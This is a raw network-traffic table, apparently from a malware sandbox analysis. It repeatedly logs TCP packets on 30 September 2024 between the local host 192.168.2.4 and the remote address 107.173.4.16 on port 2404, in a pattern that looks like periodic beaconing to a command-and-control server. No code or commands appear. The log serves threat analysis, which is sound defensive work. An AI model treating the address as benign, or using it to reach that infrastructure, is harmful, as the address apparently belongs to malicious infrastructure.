                                          Sep 30, 2024 14:00:05.372893095 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.372903109 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.372952938 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.372961044 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.372977972 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.372992992 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.373001099 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.373028994 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.373038054 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.373065948 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.373074055 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.373099089 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.521800995 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:05.526743889 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.638004065 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.693303108 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:05.693764925 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:05.695127964 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:05.698586941 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.698621988 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.698663950 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.698715925 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.698755980 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.698765039 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.698863983 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.698872089 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.698990107 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.698998928 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.699021101 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.699028969 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.699069977 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.699099064 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.699903011 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.699965000 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.699987888 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.700004101 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.700012922 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.700050116 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.700058937 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:05.700134039 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.537394047 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:06.542421103 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.647082090 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.693331957 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:06.713035107 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:06.714272976 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:06.718003035 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.718039036 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.718072891 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.718082905 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.718095064 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.718111038 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.718120098 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.718161106 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.718170881 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.722743034 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.722753048 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.722795963 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.722805977 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.722812891 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.722841978 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.722850084 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.722882032 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.722891092 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.722925901 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.722934008 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.722987890 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:06.722996950 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.553682089 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:07.558512926 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.669365883 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.724543095 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:07.801939011 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:07.803241968 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:07.806878090 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.806920052 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.806929111 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.806937933 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.807020903 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.807068110 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.807076931 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.807085037 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.807101965 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.807279110 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.811538935 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.811548948 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.811610937 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.811619997 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.811628103 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.816251040 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.816261053 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.816268921 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.816272974 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.816281080 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.816288948 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.816297054 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:07.816303968 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.568537951 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:08.573359966 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.678317070 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.724575043 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:08.752890110 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:08.754138947 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:08.757757902 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.757786989 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.757796049 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.757805109 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.757865906 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.757920980 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.757930040 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.757939100 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.757947922 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.762442112 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.762465000 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.762540102 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.762553930 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.762568951 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.762583971 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.762593031 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.762639999 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.762649059 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.762656927 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.762676954 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.762685061 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:08.762692928 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.584564924 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:09.589402914 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.694031000 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.740221977 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:09.742597103 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:09.746006966 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:09.747657061 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.747669935 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.747776031 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.747785091 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.747829914 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.747852087 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.747860909 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.747900963 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.747910976 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.752567053 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.752651930 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.752775908 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.752785921 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.752842903 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.752862930 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.752871990 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.752921104 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.752929926 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.752953053 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.753026009 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.753035069 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:09.753043890 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.599920034 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:10.604975939 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.709685087 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.764558077 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:10.942717075 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:10.944475889 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:10.949811935 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.949850082 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.949858904 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.949907064 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.950018883 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.950027943 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.950138092 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.950154066 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.950249910 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.950355053 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.957328081 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.957370996 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.957380056 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.957463980 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.957473993 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.957483053 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.957492113 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.957550049 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.957559109 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.957575083 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.957657099 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:10.957665920 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.615504026 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:11.620405912 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.852171898 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.894510984 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:11.895828009 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:11.899483919 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.899599075 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.899616003 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.899682999 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.899717093 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.899784088 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.899794102 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.899801970 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.899811029 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.899818897 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.899864912 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.899955988 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.899964094 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.899972916 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.900842905 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.900897980 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.904117107 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.904179096 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.904187918 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.904284000 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.904293060 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:11.904303074 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.631222010 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:12.636265039 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.741182089 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.786237955 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:12.787573099 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:12.791222095 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.791245937 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.791270018 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.791280031 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.791290045 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.791569948 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.791583061 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.791594028 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.791603088 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.791619062 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.791626930 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.791642904 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.791651964 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.791656017 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.792954922 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.792992115 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.793020964 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.793034077 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.793051958 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.795880079 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.796000957 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:12.796010017 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.646816015 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:13.651717901 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.756268978 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.802745104 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:13.817617893 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:13.820249081 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:13.822745085 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.822766066 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.822786093 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.822793961 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.822818041 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.822827101 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.822873116 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.822925091 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.822933912 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.827601910 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.827660084 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.827670097 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.827678919 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.827759981 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.827770948 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.827784061 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.827795029 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.827802896 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.827831030 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.827866077 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.827873945 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:13.827883005 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.663189888 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:14.798782110 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.903302908 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.955476046 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:14.956742048 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:14.960932970 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.960947990 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.960954905 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.960963964 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.960972071 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.961009026 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.961018085 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.961025953 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.961034060 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.961041927 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.965563059 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.965650082 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.965743065 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.965753078 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.965760946 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.965790987 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.965800047 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.965820074 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.965836048 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.965842962 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.965851068 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:14.966094017 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.678500891 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:15.683372021 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.826699018 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.877809048 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:15.879103899 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:15.882904053 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.882935047 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.882942915 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.882953882 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.883038044 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.883137941 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.883157015 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.883224010 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.883233070 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.883243084 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.887775898 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.887794018 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.887900114 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.887912035 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.887937069 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.887957096 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.887965918 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.887985945 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.888005972 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.888021946 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.888036013 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:15.888051987 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:16.693619967 CEST497412404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:16.698627949 CEST240449741107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:16.803523064 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:16.846040964 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:16.847278118 CEST497422404192.168.2.4107.173.4.16
                                          Sep 30, 2024 14:00:16.851095915 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:16.851113081 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:16.851125002 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:16.851161957 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:16.851218939 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:16.851227999 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:16.851264000 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:16.851305008 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:16.851432085 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:16.851442099 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:16.855928898 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:16.855951071 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:16.855978966 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:16.855988026 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:16.855998993 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:16.856049061 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:16.856057882 CEST240449742107.173.4.16192.168.2.4
                                          Sep 30, 2024 14:00:16.856143951 CEST240449742107.173.4.16192.168.2.4
